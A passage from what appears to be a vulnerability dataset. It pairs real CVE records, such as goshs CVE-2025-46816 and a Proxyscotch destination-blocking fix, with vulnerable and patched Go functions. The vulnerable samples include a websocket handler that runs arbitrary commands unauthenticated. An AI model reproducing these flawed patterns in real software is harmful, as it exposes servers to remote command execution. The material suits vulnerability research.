hoppscotch.io.\n\t\tresponse.Header().Add(\"Location\", \"https://hoppscotch.io/\")\n\t\tresponse.WriteHeader(301)\n\t\treturn\n\t} else {\n\t\t// Otherwise set the appropriate CORS polciy and continue.\n\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", request.Header.Get(\"Origin\"))\n\t}\n\n\t// For anything other than an POST request, we'll return an empty JSON object.\n\tresponse.Header().Add(\"Content-Type\", \"application/json; charset=utf-8\")\n\tif request.Method != \"POST\" {\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": true, \\\"data\\\":{\\\"sessionFingerprint\\\":\\\"\"+sessionFingerprint+\"\\\", \\\"isProtected\\\":\"+strconv.FormatBool(len(accessToken) > 0)+\"}}\")\n\t\treturn\n\t}\n\n\t// Attempt to parse request body.\n\tvar requestData Request\n\tisMultipart := strings.HasPrefix(request.Header.Get(\"content-type\"), \"multipart/form-data\")\n\tvar multipartRequestDataKey = request.Header.Get(\"multipart-part-key\")\n\tif multipartRequestDataKey == \"\" {\n\t\tmultipartRequestDataKey = \"proxyRequestData\"\n\t}\n\tif isMultipart {\n\t\tvar err = request.ParseMultipartForm(maxMemory)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t\tr := request.MultipartForm.Value[multipartRequestDataKey]\n\t\terr = json.Unmarshal([]byte(r[0]), &requestData)\n\t\tif err != nil || len(requestData.Url) == 0 || len(requestData.Method) == 0 {\n\t\t\t// If the logged err is nil here, it means either the URL or method were not supplied\n\t\t\t// in the request data.\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tvar err = json.NewDecoder(request.Body).Decode(&requestData)\n\t\tif err != nil || len(requestData.Url) == 0 || len(requestData.Method) == 0 {\n\t\t\t// If the logged err is nil here, it means either the URL or method were not supplied\n\t\t\t// in the request data.\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t}\n\n\tif len(accessToken) > 0 && requestData.AccessToken != accessToken {\n\t\tlog.Print(\"An unauthorized request was made.\")\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": false, \\\"data\\\":{\\\"message\\\":\\\"(Proxy Error) Unauthorized request; you may need to set your access token in Settings.\\\"}}\")\n\t\treturn\n\t}\n\n\t// Make the request\n\tvar proxyRequest http.Request\n\tproxyRequest.Header = make(http.Header)\n\tproxyRequest.Method = requestData.Method\n\tproxyRequest.URL, _ = url.Parse(requestData.Url)\n\n\tvar params = proxyRequest.URL.Query()\n\n\tfor k, v := range requestData.Params {\n\t\tparams.Set(k, v)\n\t}\n\tproxyRequest.URL.RawQuery = params.Encode()\n\n\tif len(requestData.Auth.Username) > 0 && len(requestData.Auth.Password) > 0 {\n\t\tproxyRequest.SetBasicAuth(requestData.Auth.Username, requestData.Auth.Password)\n\t}\n\tfor k, v := range requestData.Headers {\n\t\tproxyRequest.Header.Set(k, v)\n\t}\n\n\tproxyRequest.Header.Set(\"User-Agent\", \"Proxyscotch/1.1\")\n\n\tif isMultipart {\n\t\tbody := &bytes.Buffer{}\n\t\twriter := multipart.NewWriter(body)\n\t\tfor key := range request.MultipartForm.Value {\n\t\t\tif key == multipartRequestDataKey {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tfor _, val := range request.MultipartForm.Value[key] {\n\t\t\t\t// This usually never happens, mostly memory 
issue\n\t\t\t\terr := writer.WriteField(key, val)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field key: %s error: %v\", key, err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tfor fileKey := range request.MultipartForm.File {\n\t\t\tfor _, val := range request.MultipartForm.File[fileKey] {\n\t\t\t\tf, err := val.Open()\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field: %s err: %v\", fileKey, err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tfield, _ := writer.CreatePart(val.Header)\n\t\t\t\t_, err = io.Copy(field, f)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field: %s err: %v\", fileKey, err)\n\t\t\t\t}\n\t\t\t\t// Close need not be handled, as go will clear temp file\n\t\t\t\tdefer func(f multipart.File) {\n\t\t\t\t\terr := f.Close()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Printf(\"Failed to close file\")\n\t\t\t\t\t}\n\t\t\t\t}(f)\n\t\t\t}\n\t\t}\n\t\terr := writer.Close()\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Failed to write multipart content: %v\", err)\n\t\t\t_, _ = fmt.Fprintf(response, ErrorBodyProxyRequestFailed)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tcontentType := fmt.Sprintf(\"multipart/form-data; boundary=%v\", writer.Boundary())\n\t\tproxyRequest.Header.Set(\"content-type\", contentType)\n\t\tproxyRequest.Body = ioutil.NopCloser(bytes.NewReader(body.Bytes()))\n\t\tproxyRequest.Body.Close()\n\t} else if len(requestData.Data) > 0 {\n\t\tproxyRequest.Body = ioutil.NopCloser(strings.NewReader(requestData.Data))\n\t\tproxyRequest.Body.Close()\n\t}\n\n\tvar client http.Client\n\tvar proxyResponse *http.Response\n\tproxyResponse, err := client.Do(&proxyRequest)\n\n\tif err != nil {\n\t\tlog.Print(\"Failed to write response body: \", err.Error())\n\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\treturn\n\t}\n\n\tvar responseData Response\n\tresponseData.Success = true\n\tresponseData.Status = proxyResponse.StatusCode\n\tresponseData.StatusText = strings.Join(strings.Split(proxyResponse.Status, \" \")[1:], \" \")\n\tresponseBytes, err := ioutil.ReadAll(proxyResponse.Body)\n\tresponseData.Headers = headerToArray(proxyResponse.Header)\n\n\tif requestData.WantsBinary {\n\t\tfor _, bannedOutput := range bannedOutputs {\n\t\t\tresponseBytes = bytes.ReplaceAll(responseBytes, []byte(bannedOutput), []byte(\"[redacted]\"))\n\t\t}\n\n\t\t// If using the new binary format, encode the response body.\n\t\tresponseData.Data = base64.RawStdEncoding.EncodeToString(responseBytes)\n\t\tresponseData.IsBinary = true\n\t} else {\n\t\t// Otherwise, simply return the old format.\n\t\tresponseData.Data = string(responseBytes)\n\n\t\tfor _, bannedOutput := range bannedOutputs {\n\t\t\tresponseData.Data = strings.Replace(responseData.Data, bannedOutput, \"[redacted]\", -1)\n\t\t}\n\t}\n\n\t// Write the request body to the response.\n\terr = json.NewEncoder(response).Encode(responseData)\n\n\t// Return the response.\n\tif err != nil {\n\t\tlog.Print(\"Failed to write response body: \", err.Error())\n\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\treturn\n\t}\n}"}, {"id": "vul_go_240_4", "commit": "f319207", "file_path": "server/server.go", "start_line": 10, "end_line": 21, "snippet": "func main() {\n\thostPtr := flag.String(\"host\", \"localhost:9159\", \"the hostname that the server should listen on.\")\n\ttokenPtr := flag.String(\"token\", \"\", \"the Proxy Access Token used to restrict access to the server.\")\n\tallowedOriginsPtr := 
flag.String(\"allowed-origins\", \"*\", \"a comma separated list of allowed origins.\")\n\tbannedOutputsPtr := flag.String(\"banned-outputs\", \"\", \"a comma separated list of banned outputs.\")\n\tflag.Parse()\n\n\tfinished := make(chan bool)\n\tlibproxy.Initialize(*tokenPtr, *hostPtr, *allowedOriginsPtr, *bannedOutputsPtr, onProxyStateChangeServer, false, finished)\n\n\t<-finished\n}"}], "fix_func": [{"id": "fix_go_240_1", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "libproxy/proxy.go", "start_line": 22, "end_line": 28, "snippet": "var (\n\taccessToken string\n\tsessionFingerprint string\n\tallowedOrigins []string\n\tbannedOutputs []string\n\tbannedDests []string\n)"}, {"id": "fix_go_240_2", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "libproxy/proxy.go", "start_line": 77, "end_line": 134, "snippet": "func Initialize(\n\tinitialAccessToken string,\n\tproxyURL string,\n\tinitialAllowedOrigins string,\n\tinitialBannedOutputs string,\n\tinitialBannedDests string,\n\tonStatusChange statusChangeFunction,\n\twithSSL bool,\n\tfinished chan bool,\n) {\n\tif initialBannedOutputs != \"\" {\n\t\tbannedOutputs = strings.Split(initialBannedOutputs, \",\")\n\t}\n\tif initialBannedDests != \"\" {\n\t\tbannedDests = strings.Split(initialBannedDests, \",\")\n\t} else {\n\t\tbannedDests = []string{}\n\t}\n\tallowedOrigins = strings.Split(initialAllowedOrigins, \",\")\n\taccessToken = initialAccessToken\n\tsessionFingerprint = uuid.New().String()\n\tlog.Println(\"Starting proxy server...\")\n\n\thttp.HandleFunc(\"/\", proxyHandler)\n\n\tif !withSSL {\n\t\tgo func() {\n\t\t\thttpServerError := http.ListenAndServe(proxyURL, nil)\n\n\t\t\tif httpServerError != nil {\n\t\t\t\tonStatusChange(\"An error occurred: \"+httpServerError.Error(), false)\n\t\t\t}\n\n\t\t\tfinished <- true\n\t\t}()\n\n\t\tonStatusChange(\"Listening on http://\"+proxyURL+\"/\", true)\n\t} else {\n\t\tonStatusChange(\"Checking SSL certificate...\", false)\n\n\t\terr := EnsurePrivateKeyInstalled()\n\t\tif err != nil {\n\t\t\tlog.Println(err.Error())\n\t\t\tonStatusChange(\"An error occurred.\", false)\n\t\t}\n\n\t\tgo func() {\n\t\t\thttpServerError := http.ListenAndServeTLS(proxyURL, GetOrCreateDataPath()+\"/cert.pem\", GetOrCreateDataPath()+\"/key.pem\", nil)\n\n\t\t\tif httpServerError != nil {\n\t\t\t\tonStatusChange(\"An error occurred.\", false)\n\t\t\t}\n\t\t}()\n\n\t\tonStatusChange(\"Listening on https://\"+proxyURL+\"/\", true)\n\t\tlog.Println(\"Proxy server listening on https://\" + proxyURL + \"/\")\n\t}\n}"}, {"id": "fix_go_240_3", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "libproxy/proxy.go", "start_line": 148, "end_line": 350, "snippet": "func proxyHandler(response http.ResponseWriter, request *http.Request) {\n\t// We want to allow all types of requests to the proxy, though we only want to allow certain\n\t// origins.\n\tresponse.Header().Add(\"Access-Control-Allow-Headers\", \"*\")\n\tif request.Method == \"OPTIONS\" {\n\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", \"*\")\n\t\tresponse.WriteHeader(200)\n\t\treturn\n\t}\n\n\tif request.Header.Get(\"Origin\") == \"\" || !isAllowedOrigin(request.Header.Get(\"Origin\")) {\n\t\tif strings.HasPrefix(request.Header.Get(\"Content-Type\"), \"application/json\") {\n\t\t\tresponse.Header().Add(\"Access-Control-Allow-Headers\", \"*\")\n\t\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", \"*\")\n\t\t\tresponse.WriteHeader(200)\n\t\t\t_, _ = fmt.Fprintln(response, 
ErrorBodyProxyRequestFailed)\n\t\t\treturn\n\t\t}\n\n\t\t// If it is not an allowed origin, redirect back to hoppscotch.io.\n\t\tresponse.Header().Add(\"Location\", \"https://hoppscotch.io/\")\n\t\tresponse.WriteHeader(301)\n\t\treturn\n\t} else {\n\t\t// Otherwise set the appropriate CORS polciy and continue.\n\t\tresponse.Header().Add(\"Access-Control-Allow-Origin\", request.Header.Get(\"Origin\"))\n\t}\n\n\t// For anything other than an POST request, we'll return an empty JSON object.\n\tresponse.Header().Add(\"Content-Type\", \"application/json; charset=utf-8\")\n\tif request.Method != \"POST\" {\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": true, \\\"data\\\":{\\\"sessionFingerprint\\\":\\\"\"+sessionFingerprint+\"\\\", \\\"isProtected\\\":\"+strconv.FormatBool(len(accessToken) > 0)+\"}}\")\n\t\treturn\n\t}\n\n\t// Attempt to parse request body.\n\tvar requestData Request\n\tisMultipart := strings.HasPrefix(request.Header.Get(\"content-type\"), \"multipart/form-data\")\n\tvar multipartRequestDataKey = request.Header.Get(\"multipart-part-key\")\n\tif multipartRequestDataKey == \"\" {\n\t\tmultipartRequestDataKey = \"proxyRequestData\"\n\t}\n\tif isMultipart {\n\t\tvar err = request.ParseMultipartForm(maxMemory)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t\tr := request.MultipartForm.Value[multipartRequestDataKey]\n\t\terr = json.Unmarshal([]byte(r[0]), &requestData)\n\t\tif err != nil || len(requestData.Url) == 0 || len(requestData.Method) == 0 {\n\t\t\t// If the logged err is nil here, it means either the URL or method were not supplied\n\t\t\t// in the request data.\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\tvar err = json.NewDecoder(request.Body).Decode(&requestData)\n\t\tif err != nil || len(requestData.Url) == 0 || len(requestData.Method) == 0 {\n\t\t\t// If the logged err is nil here, it means either the URL or method were not supplied\n\t\t\t// in the request data.\n\t\t\tlog.Printf(\"Failed to parse request body: %v\", err)\n\t\t\t_, _ = fmt.Fprintln(response, ErrorBodyInvalidRequest)\n\t\t\treturn\n\t\t}\n\t}\n\n\tif len(accessToken) > 0 && requestData.AccessToken != accessToken {\n\t\tlog.Print(\"An unauthorized request was made.\")\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": false, \\\"data\\\":{\\\"message\\\":\\\"(Proxy Error) Unauthorized request; you may need to set your access token in Settings.\\\"}}\")\n\t\treturn\n\t}\n\n\t// Make the request\n\tvar proxyRequest http.Request\n\tproxyRequest.Header = make(http.Header)\n\tproxyRequest.Method = requestData.Method\n\tproxyRequest.URL, _ = url.Parse(requestData.Url)\n\n\t// Block requests to illegal destinations\n\tif !isAllowedDest(proxyRequest.URL.Hostname()) {\n\t\tlog.Print(\"A request to a banned destination was made.\")\n\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": false, \\\"data\\\":{\\\"message\\\":\\\"(Proxy Error) Request cannot be to this destination.\\\"}}\")\n\t\treturn\n\t}\n\n\tvar params = proxyRequest.URL.Query()\n\n\tfor k, v := range requestData.Params {\n\t\tparams.Set(k, v)\n\t}\n\tproxyRequest.URL.RawQuery = params.Encode()\n\n\tif len(requestData.Auth.Username) > 0 && len(requestData.Auth.Password) > 0 {\n\t\tproxyRequest.SetBasicAuth(requestData.Auth.Username, requestData.Auth.Password)\n\t}\n\tfor k, v := range requestData.Headers 
{\n\t\tproxyRequest.Header.Set(k, v)\n\t}\n\n\tproxyRequest.Header.Set(\"User-Agent\", \"Proxyscotch/1.1\")\n\n\tif isMultipart {\n\t\tbody := &bytes.Buffer{}\n\t\twriter := multipart.NewWriter(body)\n\t\tfor key := range request.MultipartForm.Value {\n\t\t\tif key == multipartRequestDataKey {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tfor _, val := range request.MultipartForm.Value[key] {\n\t\t\t\t// This usually never happens, mostly memory issue\n\t\t\t\terr := writer.WriteField(key, val)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field key: %s error: %v\", key, err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tfor fileKey := range request.MultipartForm.File {\n\t\t\tfor _, val := range request.MultipartForm.File[fileKey] {\n\t\t\t\tf, err := val.Open()\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field: %s err: %v\", fileKey, err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tfield, _ := writer.CreatePart(val.Header)\n\t\t\t\t_, err = io.Copy(field, f)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"Failed to write multipart field: %s err: %v\", fileKey, err)\n\t\t\t\t}\n\t\t\t\t// Close need not be handled, as go will clear temp file\n\t\t\t\tdefer func(f multipart.File) {\n\t\t\t\t\terr := f.Close()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Printf(\"Failed to close file\")\n\t\t\t\t\t}\n\t\t\t\t}(f)\n\t\t\t}\n\t\t}\n\t\terr := writer.Close()\n\t\tif err != nil {\n\t\t\tlog.Printf(\"Failed to write multipart content: %v\", err)\n\t\t\t_, _ = fmt.Fprintf(response, ErrorBodyProxyRequestFailed)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tcontentType := fmt.Sprintf(\"multipart/form-data; boundary=%v\", writer.Boundary())\n\t\tproxyRequest.Header.Set(\"content-type\", contentType)\n\t\tproxyRequest.Body = ioutil.NopCloser(bytes.NewReader(body.Bytes()))\n\t\tproxyRequest.Body.Close()\n\t} else if len(requestData.Data) > 0 {\n\t\tproxyRequest.Body = ioutil.NopCloser(strings.NewReader(requestData.Data))\n\t\tproxyRequest.Body.Close()\n\t}\n\n\tvar client http.Client\n\tvar proxyResponse *http.Response\n\tproxyResponse, err := client.Do(&proxyRequest)\n\n\tif err != nil {\n\t\tlog.Print(\"Failed to write response body: \", err.Error())\n\t\t_, _ = fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\treturn\n\t}\n\n\tvar responseData Response\n\tresponseData.Success = true\n\tresponseData.Status = proxyResponse.StatusCode\n\tresponseData.StatusText = strings.Join(strings.Split(proxyResponse.Status, \" \")[1:], \" \")\n\tresponseBytes, err := ioutil.ReadAll(proxyResponse.Body)\n\tresponseData.Headers = headerToArray(proxyResponse.Header)\n\n\tif requestData.WantsBinary {\n\t\tfor _, bannedOutput := range bannedOutputs {\n\t\t\tresponseBytes = bytes.ReplaceAll(responseBytes, []byte(bannedOutput), []byte(\"[redacted]\"))\n\t\t}\n\n\t\t// If using the new binary format, encode the response body.\n\t\tresponseData.Data = base64.RawStdEncoding.EncodeToString(responseBytes)\n\t\tresponseData.IsBinary = true\n\t} else {\n\t\t// Otherwise, simply return the old format.\n\t\tresponseData.Data = string(responseBytes)\n\n\t\tfor _, bannedOutput := range bannedOutputs {\n\t\t\tresponseData.Data = strings.Replace(responseData.Data, bannedOutput, \"[redacted]\", -1)\n\t\t}\n\t}\n\n\t// Write the request body to the response.\n\terr = json.NewEncoder(response).Encode(responseData)\n\n\t// Return the response.\n\tif err != nil {\n\t\tlog.Print(\"Failed to write response body: \", err.Error())\n\t\t_, _ = 
fmt.Fprintln(response, ErrorBodyProxyRequestFailed)\n\t\treturn\n\t}\n}"}, {"id": "fix_go_240_4", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "server/server.go", "start_line": 10, "end_line": 23, "snippet": "func main() {\n\thostPtr := flag.String(\"host\", \"localhost:9159\", \"the hostname that the server should listen on.\")\n\ttokenPtr := flag.String(\"token\", \"\", \"the Proxy Access Token used to restrict access to the server.\")\n\tallowedOriginsPtr := flag.String(\"allowed-origins\", \"*\", \"a comma separated list of allowed origins.\")\n\tbannedOutputsPtr := flag.String(\"banned-outputs\", \"\", \"a comma separated list of banned outputs.\")\n\tbannedDestsPtr := flag.String(\"banned-dests\", \"\", \"a comma separated list of banned proxy destinations.\")\n\n\tflag.Parse()\n\n\tfinished := make(chan bool)\n\tlibproxy.Initialize(*tokenPtr, *hostPtr, *allowedOriginsPtr, *bannedOutputsPtr, *bannedDestsPtr, onProxyStateChangeServer, false, finished)\n\n\t<-finished\n}"}, {"id": "fix_go_240_5", "commit": "de67380f62f907f201d75854b76024ba4885fab7", "file_path": "libproxy/proxy.go", "start_line": 53, "end_line": 62, "snippet": "func isAllowedDest(dest string) bool {\n\tfor _, b := range bannedDests {\n\t\tif b == dest {\n\t\t\treturn false\n\t\t}\n\t}\n\n\treturn true\n}\n"}], "vul_patch": "--- a/libproxy/proxy.go\n+++ b/libproxy/proxy.go\n@@ -3,4 +3,5 @@\n \tsessionFingerprint string\n \tallowedOrigins []string\n \tbannedOutputs []string\n+\tbannedDests []string\n )\n\n--- a/libproxy/proxy.go\n+++ b/libproxy/proxy.go\n@@ -3,12 +3,18 @@\n \tproxyURL string,\n \tinitialAllowedOrigins string,\n \tinitialBannedOutputs string,\n+\tinitialBannedDests string,\n \tonStatusChange statusChangeFunction,\n \twithSSL bool,\n \tfinished chan bool,\n ) {\n \tif initialBannedOutputs != \"\" {\n \t\tbannedOutputs = strings.Split(initialBannedOutputs, \",\")\n+\t}\n+\tif initialBannedDests != \"\" {\n+\t\tbannedDests = strings.Split(initialBannedDests, \",\")\n+\t} else {\n+\t\tbannedDests = []string{}\n \t}\n \tallowedOrigins = strings.Split(initialAllowedOrigins, \",\")\n \taccessToken = initialAccessToken\n\n--- a/libproxy/proxy.go\n+++ b/libproxy/proxy.go\n@@ -78,6 +78,13 @@\n \tproxyRequest.Header = make(http.Header)\n \tproxyRequest.Method = requestData.Method\n \tproxyRequest.URL, _ = url.Parse(requestData.Url)\n+\n+\t// Block requests to illegal destinations\n+\tif !isAllowedDest(proxyRequest.URL.Hostname()) {\n+\t\tlog.Print(\"A request to a banned destination was made.\")\n+\t\t_, _ = fmt.Fprintln(response, \"{\\\"success\\\": false, \\\"data\\\":{\\\"message\\\":\\\"(Proxy Error) Request cannot be to this destination.\\\"}}\")\n+\t\treturn\n+\t}\n \n \tvar params = proxyRequest.URL.Query()\n \n\n--- a/server/server.go\n+++ b/server/server.go\n@@ -3,10 +3,12 @@\n \ttokenPtr := flag.String(\"token\", \"\", \"the Proxy Access Token used to restrict access to the server.\")\n \tallowedOriginsPtr := flag.String(\"allowed-origins\", \"*\", \"a comma separated list of allowed origins.\")\n \tbannedOutputsPtr := flag.String(\"banned-outputs\", \"\", \"a comma separated list of banned outputs.\")\n+\tbannedDestsPtr := flag.String(\"banned-dests\", \"\", \"a comma separated list of banned proxy destinations.\")\n+\n \tflag.Parse()\n \n \tfinished := make(chan bool)\n-\tlibproxy.Initialize(*tokenPtr, *hostPtr, *allowedOriginsPtr, *bannedOutputsPtr, onProxyStateChangeServer, false, finished)\n+\tlibproxy.Initialize(*tokenPtr, *hostPtr, *allowedOriginsPtr, *bannedOutputsPtr, 
*bannedDestsPtr, onProxyStateChangeServer, false, finished)\n \n \t<-finished\n }\n\n--- /dev/null\n+++ b/libproxy/proxy.go\n@@ -0,0 +1,9 @@\n+func isAllowedDest(dest string) bool {\n+\tfor _, b := range bannedDests {\n+\t\tif b == dest {\n+\t\t\treturn false\n+\t\t}\n+\t}\n+\n+\treturn true\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-46816", "cve_description": "goshs is a SimpleHTTPServer written in Go. Starting in version 0.3.4 and prior to version 1.0.5, running goshs without arguments makes it possible for anyone to execute commands on the server. The function `dispatchReadPump` does not check the `-c` CLI option, thus allowing anyone to execute arbitrary commands through the use of websockets. Version 1.0.5 fixes the issue.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/patrickhener/goshs", "patch_url": ["https://github.com/patrickhener/goshs/commit/160220974576afe5111485b8d12fd36058984cfa"], "programing_language": "Go", "vul_func": [{"id": "vul_go_222_1", "commit": "cd1cbfd", "file_path": "httpserver/server.go", "start_line": 192, "end_line": 259, "snippet": "func (fs *FileServer) Start(what string) {\n\t// Setup routing with gorilla/mux\n\tmux := NewCustomMux()\n\n\taddr := fs.SetupMux(mux, what)\n\n\t// construct and bind listener\n\tlistener, err := net.Listen(\"tcp\", addr)\n\tif err != nil {\n\t\tlogger.Fatalf(\"Error binding to listener '%s': %+v\", addr, err)\n\t}\n\tdefer func() {\n\t\tif err := listener.Close(); err != nil {\n\t\t\tlogger.Errorf(\"error closing tcp listener: %+v\", err)\n\t\t}\n\t}()\n\n\t// construct server\n\tserver := http.Server{\n\t\t// Addr: addr,\n\t\tHandler: http.AllowQuerySemicolons(mux),\n\t\tReadHeaderTimeout: 10 * time.Second, // Mitigate Slow Loris Attack\n\t\tErrorLog: log.New(io.Discard, \"\", 0),\n\t\t// Against good practice no timeouts here, otherwise big files would be terminated when downloaded\n\t}\n\n\t// init clipboard\n\tif !fs.NoClipboard {\n\t\tfs.Clipboard = clipboard.New()\n\n\t\t// init websocket hub\n\t\tfs.Hub = ws.NewHub(fs.Clipboard)\n\t\tgo fs.Hub.Run()\n\t}\n\n\t// Print silent banner\n\tif fs.Silent {\n\t\tlogger.Info(\"Serving in silent mode - no dir listing available at HTTP Listener\")\n\t}\n\n\t// Print all embedded files as info to the console\n\tfs.PrintEmbeddedFiles()\n\n\t// Register webhook\n\tif fs.WebhookEnable {\n\t\tswitch strings.ToLower(fs.WebhookProvider) {\n\t\tcase \"discord\":\n\t\t\tfs.Webhook = &webhook.DiscordWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t\tUsername: \"goshs\",\n\t\t\t}\n\t\tcase \"slack\":\n\t\t\tfs.Webhook = &webhook.SlackWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t}\n\t\tcase \"mattermost\":\n\t\t\tfs.Webhook = &webhook.MattermostWebhook{\n\t\t\t\tURL: fs.WebhookURL,\n\t\t\t\tUsername: \"goshs\",\n\t\t\t}\n\t\tdefault:\n\t\t\tlogger.Fatalf(\"Webhook provider '%s' not supported\", fs.WebhookProvider)\n\t\t}\n\t}\n\n\t// Start listener\n\tfs.StartListener(server, what, listener)\n}"}, {"id": "vul_go_222_2", "commit": "cd1cbfd", "file_path": "ws/client.go", "start_line": 80, "end_line": 130, "snippet": "func (c *Client) dispatchReadPump(packet Packet) {\n\t// Switch here over possible socket events and pull in handlers\n\tswitch packet.Type {\n\tcase \"newEntry\":\n\t\tvar entry string\n\t\tif err := json.Unmarshal(packet.Content, &entry); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json 
packet: %+v\", err)\n\t\t}\n\t\tif err := c.hub.cb.AddEntry(entry); err != nil {\n\t\t\tlogger.Errorf(\"Error creating Clipboard entry: %+v\", err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"delEntry\":\n\t\tvar id string\n\t\tif err := json.Unmarshal(packet.Content, &id); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tiid, err := strconv.Atoi(id)\n\t\tif err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tif err := c.hub.cb.DeleteEntry(iid); err != nil {\n\t\t\tlogger.Errorf(\"Error to delete Clipboard entry with id: %s: %+v\", string(packet.Content), err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"clearClipboard\":\n\t\tif err := c.hub.cb.ClearClipboard(); err != nil {\n\t\t\tlogger.Errorf(\"Error clearing clipboard: %+v\", err)\n\t\t}\n\t\tc.refreshClipboard()\n\n\tcase \"command\":\n\t\tvar command string\n\t\tif err := json.Unmarshal(packet.Content, &command); err != nil {\n\t\t\tlogger.Errorf(\"Error reading json packet: %+v\", err)\n\t\t}\n\t\tlogger.Debugf(\"Command was: %+v\", command)\n\t\toutput, err := cli.RunCMD(command)\n\t\tif err != nil {\n\t\t\tlogger.Errorf(\"Error running command: %+v\", err)\n\t\t}\n\t\tlogger.Debugf(\"Output: %+v\", output)\n\t\tc.updateCLI(output)\n\n\tdefault:\n\t\tlogger.Warnf(\"The event sent via websocket cannot be handeled: %+v\", packet.Type)\n\t}\n\n}"}, {"id": "vul_go_222_3", "commit": "cd1cbfd", "file_path": "ws/hub.go", "start_line": 9, "end_line": 24, "snippet": "type Hub struct {\n\t// Registered clients.\n\tclients map[*Client]bool\n\n\t// Inbound messages from the clients.\n\tbroadcast chan []byte\n\n\t// Register requests from the clients.\n\tregister chan *Client\n\n\t// Unregister requests from clients.\n\tunregister chan *Client\n\n\t// Handle clipboard\n\tcb *clipboard.Clipboard\n}"}, {"id": "vul_go_222_4", "commit": "cd1cbfd", "file_path": "ws/hub.go", "start_line": 27, "end_line": 35, "snippet": "func NewHub(cb *clipboard.Clipboard) *Hub {\n\treturn &Hub{\n\t\tbroadcast: make(chan []byte),\n\t\tregister: make(chan *Client),\n\t\tunregister: make(chan *Client),\n\t\tclients: make(map[*Client]bool),\n\t\tcb: cb,\n\t}\n}"}], "fix_func": [{"id": "fix_go_222_1", "commit": "160220974576afe5111485b8d12fd36058984cfa", "file_path": "httpserver/server.go", "start_line": 192, "end_line": 259, "snippet": "func (fs *FileServer) Start(what string) {\n\t// Setup routing with gorilla/mux\n\tmux := NewCustomMux()\n\n\taddr := fs.SetupMux(mux, what)\n\n\t// construct and bind listener\n\tlistener, err := net.Listen(\"tcp\", addr)\n\tif err != nil {\n\t\tlogger.Fatalf(\"Error binding to listener '%s': %+v\", addr, err)\n\t}\n\tdefer func() {\n\t\tif err := listener.Close(); err != nil {\n\t\t\tlogger.Errorf(\"error closing tcp listener: %+v\", err)\n\t\t}\n\t}()\n\n\t// construct server\n\tserver := http.Server{\n\t\t// Addr: addr,\n\t\tHandler: http.AllowQuerySemicolons(mux),\n\t\tReadHeaderTimeout: 10 * time.Second, // Mitigate Slow Loris Attack\n\t\tErrorLog: log.New(io.Discard, \"\", 0),\n\t\t// Against good practice no timeouts here, otherwise big files would be terminated when downloaded\n\t}\n\n\t// init clipboard\n\tif !fs.NoClipboard {\n\t\tfs.Clipboard = clipboard.New()\n\n\t\t// init websocket 